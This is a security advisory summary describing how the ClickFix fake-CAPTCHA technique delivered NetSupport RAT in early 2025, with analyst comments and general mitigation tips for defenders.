Summary:
Beginning in early January 2025, eSentire Threat Response Unit observed an increase in the number of incidents involving the NetSupport Remote Access Trojan (RAT). The RAT was originally developed as a remote IT support tool in 1989 and was known as NetSupport Manager but has been weaponized by cybercriminals in recent years. The adversary has remained active leading into early February. NetSupport RAT is a malware that grants the attackers full control over the victim's host, allowing them to monitor the user's screen, control the keyboard and mouse, upload and download files, and launch and execute malicious commands, making defending against it a priority. NetSupport can cause severe incidents by facilitating disruptive attacks such as ransomware deployment and the compromise of sensitive data. There is no information regarding how users are directed to the compromised website hidden by the fake CAPTCHA wall.

The ClickFix technique was used in this campaign in January 2025 to deliver NetSupport RAT. ClickFix is a technique used by threat actors to inject a fake CAPTCHA webpage on compromised websites, instructing users to follow certain steps to copy and execute malicious PowerShell commands on their host to download and run malware payloads. In recently observed incidents, the NetSupport RAT payloads were often hosted on a URL that contained “.png” in the URL path. When the victim executes the PowerShell command, it downloads NetSupport RAT client and configuration file on the host to establish C2 connections. The NetSupport RAT C2 gateway URL often contains the string "fakeurl.htm" in its path. In the attack chains identified by the cybersecurity company, the PowerShell command is used to download and execute the NetSupport RAT client from a remote server that hosts the malicious components in the form of PNG image files.

Security Officer Comments:
Organizations are recommended to validate their security controls and educate users on common initial access techniques, such as ClickFix because the NetSupport RAT campaign is ongoing. The ClickFix technique was recently used in a campaign distributing the popular Lumma Stealer as well, highlighting the prevalent use of this technique to bypass defenses and deliver payloads. This Lumma Stealer is a newer version that uses the ChaCha20 cipher for decrypting a configuration file containing the list of command-and-control (C2) servers. Threat actors, including TA569, have been observed delivering NetSupport to target organizations via fake browser update campaigns. NetSupport RAT is a sophisticated malware that is difficult to detect and remove. It is important to be aware of the threat of the NetSupport RAT Clickfix Distribution and to take steps to protect your organization’s endpoints.

Suggested Corrections:
Here are some tips for mitigating the NetSupport RAT via Clickfix Distribution:

• Do not click on links or open attachments from unknown or untrusted sources as they may be phishing attempts aiming to direct users to one of the compromised fake CAPTCHA sites.
• Keep your software up-to-date, including your antivirus and anti-malware software.
• Employee should be cautious when entering credentials into online forms.
• Use strong passwords and change them regularly.
• Segment the network into isolated subnetworks to improve security and manageability.
• If you think your organization’s endpoints have been infected with the NetSupport RAT via Clickfix Distribution, you should take immediate action to remove it. Seek out third-party solutions for help.

Link(s):
https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html

https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution